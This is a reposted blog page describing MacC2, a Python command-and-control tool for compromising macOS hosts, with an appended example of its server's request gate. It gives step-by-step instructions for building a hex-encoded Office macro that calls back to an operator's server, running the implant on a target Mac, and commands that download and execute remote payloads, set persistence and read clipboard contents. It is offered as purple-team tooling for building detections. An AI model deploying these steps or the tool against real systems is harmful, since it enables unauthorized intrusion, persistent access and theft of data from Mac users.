MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities
2020-11-17 05:30:00 Author: www.blogger.com (view original)

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p><br /></p><p>MacC2 is a macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> tool written in python that uses Objective-C calls or python libraries instead of <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> executions. The client is written in python2, which, though deprecated, still ships with base Big Sur installs. Apple plans to eventually remove scripting runtimes from base macOS installs (python2, or possibly python altogether), but as of Nov 2020 python is still included by default on base installs of Big Sur. <strong>I wrote this tool to aid <a href="https://www.kitploit.com/search/label/Purple%20Team" target="_blank" title="purple team">purple team</a> exercises aimed at building detections for python-based post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> frameworks on macOS.</strong></p><p><br /></p> <p>You can set up the server locally, or you can use the docker setup included in this repo. Instructions below:</p> <br /><span style="font-size: large;"><b>Instructions for Running Using Docker:</b></span><br /> <p><em><strong>If you do not already have docker set up:</strong></em></p> <ol> <li><code>chmod +x install_docker_linux.sh</code></li> <li><code>sudo ./install_docker_linux.sh</code></li> </ol> <p><em><strong>Next:</strong></em></p> <ol> <li><code>chmod +x setup.sh</code></li> <li><code>sudo ./setup.sh</code> <strong>(this creates a self-signed ssl cert and key, generates a macro for the server host and port you specify (written to macro.txt locally), builds the macc2-docker image, and runs the MacC2 server inside a container named macc2-container in interactive mode)</strong></li> <li>when prompted, enter the IP/hostname of the MacC2 server<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/s868/MacC2_1_pic30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="868" height="66" src="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/w640-h66/MacC2_1_pic30.png" width="640" /></a></div><br /></li> <li>when prompted, enter the port that the MacC2 server will listen on<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/s956/MacC2_2_pic31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="956" height="62"
src="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/w640-h62/MacC2_2_pic31.png" width="640" /></a></div><br /></li> <li>A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/s2942/MacC2_3_pic32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="2942" height="54" src="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/w640-h54/MacC2_3_pic32.png" width="640" /></a></div><br /></li> <li>Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container named macc2-container. 
Once finished the MacC2 server will listen on the specified port:<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/s2048/MacC2_4_pic33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="2048" height="156" src="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/w640-h156/MacC2_4_pic33.png" width="640" /></a></div><br /></li> <li>You can run <em>docker ps</em> and validate that the MacC2 server is running (you will see a container named macc2-container listed there)</li> </ol> <p><strong>Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server, you will need to delete the macc2-container name after each use or else you will get an error "The container name "/macc2-container" is already in use by container". 
You can run the command below to delete the macc2-container after each run:</strong></p> <blockquote> <p>docker rm macc2-container</p> </blockquote> <p>You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.</p> <br /><span style="font-size: large;"><b>Running Locally (Without Using Docker)</b></span><br /> <p>If you opt to not use docker, you can set up the server locally using the steps below:</p> <p>Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:</p> <p><code>pip install aiohttp</code> <strong>(if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library)</strong>:</p> <p><code>python3 -m pip install --upgrade --force pip</code></p> <p><strong><em>On C2 Server:</em></strong></p> <ol> <li>Set up ssl (note: use a key size of at least 2048)</li> </ol> <p>If you do not have your own cert, you can use the following to generate a self signed cert:</p> <ul> <li> 1: <code>openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key</code> </li> <li> 2: <code>openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem</code> </li> </ul> <p><strong>note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately</strong></p> <ol start="2"> <li>Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. 
You can copy and paste the contents of macro.txt into an MS Office document:</li> </ol> <p>Usage:</p> <p><code>python3 macro_generator.py -s [C2 Server IP/domain] -p [C2 Server Port]</code></p> <p>Example:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/s2724/MacC2_5_pic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="2724" height="94" src="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/w640-h94/MacC2_5_pic3.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>Start the generated MacC2_server.py script to listen for a connection:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/s1500/MacC2_6_pic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="1500" height="140" src="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/w640-h140/MacC2_6_pic4.png" width="640" /></a></div><p><br /></p> <p><strong><em>On <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="Client Side">Client Side</a> (the target mac host):</em></strong></p> <ol> <li> If you do not want to be limited by the Office macro sandbox and want the full set of functions, you can instead copy the MacC2_client.py script to the client (assuming you already have access). 
</li> <li> On the client, run the MacC2_client.py script: <code>python MacC2_client.py</code></li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/s912/MacC2_7_pic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="58" data-original-width="912" height="40" src="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/w640-h40/MacC2_7_pic5.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>On the server, you will see an inbound connection. Example below:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/s1508/MacC2_8_pic6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1508" height="138" src="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/w640-h138/MacC2_8_pic6.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Using MacC2</b></span><br /> <p>After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). 
Once you type "done" and hit Enter, all of the queued commands are sent to the client for execution.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p>&nbsp;</p> <p>Each command is fairly self-explanatory. Commands that are not OPSEC safe (i.e., those that spawn command line executions or cause pop-ups) are flagged in red in the help menu.</p> <p>Functions of Note:</p> <ul> <li>You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. You can then pass the URL of the hosted file to MacC2 with the <strong>runjxa</strong> command to have MacC2 download and execute the Mythic JXA payload:</li> </ul> <p><code>&gt;&gt;&gt; runjxa &lt;url_to_JXA_.js_payload&gt;</code></p> <p><strong>Note: If you gain access using the MS Office macro, the persistence method will not work because of the macro sandbox. The files are still dropped and the login item is still inserted, but on reboot the quarantine attribute on the dropped files prevents the persistence from executing.</strong></p> <br /><span style="font-size: large;"><b>Additional Info</b></span><br /> <p>The MacC2 server uses aiohttp for asynchronous web comms. 
To ensure that only MacC2 agents can access the server, the server includes the following checks:</p> <ul> <li> A specific user agent string check (if a request fails this check it receives a 404 Not Found) </li> <li> A specific token check (if a request fails this check it receives a 404 Not Found) </li> </ul> <p>Both values are embedded in the client, so they filter out scanners and stray requests rather than keeping out anyone who recovers the client script or macro.</p> <p>The operator flow after setting everything up and getting a callback is:</p> <ul> <li> view the help menu for command options </li> <li> enter a command name and press Enter for each command you want to run </li> <li> enter "done" and press Enter to have the queued commands sent to the client for execution </li> <li> <strong>NOTE: The default sleep is 10 seconds. The operator can change it with the sleep [numberofseconds] command.</strong> </li> <li> NOTE: The MacC2 server currently has no convenient way to switch between sessions when multiple clients connect. Instead, the server automatically switches between sessions after each command executed, so the operator needs to watch the IP shown in the connection to know which session is being interacted with. </li> </ul> <br /><span style="font-size: large;"><b>Macro Limitations</b></span><br /> <p>MacC2 does NOT include any sandbox escapes, so not all functions work when access is gained via the Office macro. Functions that DO work from the sandbox include:</p> <ul> <li> runjxa </li> <li> systeminfo </li> <li> persist: MacC2 can drop files to disk from a sandboxed macro payload. However, on reboot the persistence will not execute because of the quarantine attribute on the dropped files. 
</li> <li> addresses </li> <li> prompt </li> <li> clipboard </li> <li> shell (not OPSEC safe) </li> <li> spawn (not OPSEC safe) </li> <li> cd and listdir (the sandbox blocks access to most directories, but you can list the root '/' directory and potentially others as well)</li></ul><div><br /></div> <p><strong><em>DISCLAIMER</em></strong></p> <p>This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="Download MacC2">Download MacC2</a></span></b></div><div>Zion3R</div>
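<p>The request gate and the operator command queue described under Additional Info above, as an added example that is not MacC2's own code: a stripped-down server that answers 404 unless both the user agent and the token match, and that holds queued commands until the operator types "done", after which the client's next poll receives them as one batch. Python's stdlib http.server stands in for aiohttp so the example runs offline. The endpoint path /tasks, the X-Token header name, the user agent and token values, the JSON task format, and handling of the sleep command on the server side are all assumptions, and the constant-time comparison with hmac.compare_digest is this example's choice, not something the page says MacC2 does.</p>

```python
"""Added example, not MacC2's own code: a minimal model of the server-side request gate
(User-Agent + token, anything else gets 404) and the operator command queue that is
released to the client on "done". The stdlib http.server stands in for aiohttp so the
example runs offline; the path, header name, token and JSON shape are assumptions."""
import hmac
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Assumed values: in MacC2 these are baked into the generated client/macro.
EXPECTED_UA = "MacC2-Agent/1.0"
EXPECTED_TOKEN = "c0ffee-4f1c-assumed-token"
SLEEP_DEFAULT = 10  # the page states a 10 second default sleep


class TaskQueue:
    """Commands typed by the operator accumulate until "done", then ship as one batch."""

    def __init__(self):
        self._pending = []
        self._ready = []
        self._lock = threading.Lock()
        self.sleep = SLEEP_DEFAULT

    def operator_input(self, line):
        line = line.strip()
        with self._lock:
            if line == "done":
                self._ready.extend(self._pending)
                self._pending = []
            elif line.startswith("sleep "):
                # Assumption: the sleep command only changes the poll interval.
                self.sleep = int(line.split(None, 1)[1])
            elif line:
                self._pending.append(line)

    def next_batch(self):
        """Hand the released commands to the polling client exactly once."""
        with self._lock:
            batch, self._ready = self._ready, []
            return batch


def authorize(headers):
    """Both checks must pass; compare_digest keeps the token check constant-time
    (this example's choice, the page does not say how MacC2 compares it)."""
    ua_ok = headers.get("User-Agent", "") == EXPECTED_UA
    token_ok = hmac.compare_digest(headers.get("X-Token", "").encode(), EXPECTED_TOKEN.encode())
    return ua_ok and token_ok


class Handler(BaseHTTPRequestHandler):
    queue = TaskQueue()

    def do_GET(self):
        # Anything that is not a valid agent request looks like a dead endpoint.
        if not authorize(self.headers) or self.path != "/tasks":
            self.send_error(404)
            return
        body = json.dumps({"sleep": self.queue.sleep, "tasks": self.queue.next_batch()}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def poll(base_url, ua, token):
    """Client side: one check-in. Returns (status, parsed body or None)."""
    req = Request(base_url + "/tasks", headers={"User-Agent": ua, "X-Token": token})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except HTTPError as err:
        return err.code, None


def run_demo():
    """Start the server on a random loopback port and walk through one operator cycle."""
    Handler.queue = TaskQueue()
    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        Handler.queue.operator_input("systeminfo")
        Handler.queue.operator_input("clipboard")
        queued = poll(base, EXPECTED_UA, EXPECTED_TOKEN)        # nothing released yet
        Handler.queue.operator_input("sleep 30")
        Handler.queue.operator_input("done")
        released = poll(base, EXPECTED_UA, EXPECTED_TOKEN)      # batch delivered once
        again = poll(base, EXPECTED_UA, EXPECTED_TOKEN)         # queue is empty again
        scanner = poll(base, "Mozilla/5.0", EXPECTED_TOKEN)     # right token, wrong UA
        bad_token = poll(base, EXPECTED_UA, "guess")            # right UA, wrong token
        return {"queued": queued, "released": released, "again": again,
                "scanner": scanner, "bad_token": bad_token}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

<p>Failing either check produces the same 404 a missing path would, which is the behaviour the page describes. Since the user agent and token ship inside the client, a defender who recovers the dropped script or macro can both fingerprint the beaconing and talk to the server, so treat these checks as a filter against opportunistic scanning rather than as agent authentication.</p>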

Source: http://www.blogger.com/feeds/8317222231133660547/posts/default/7823885273680205673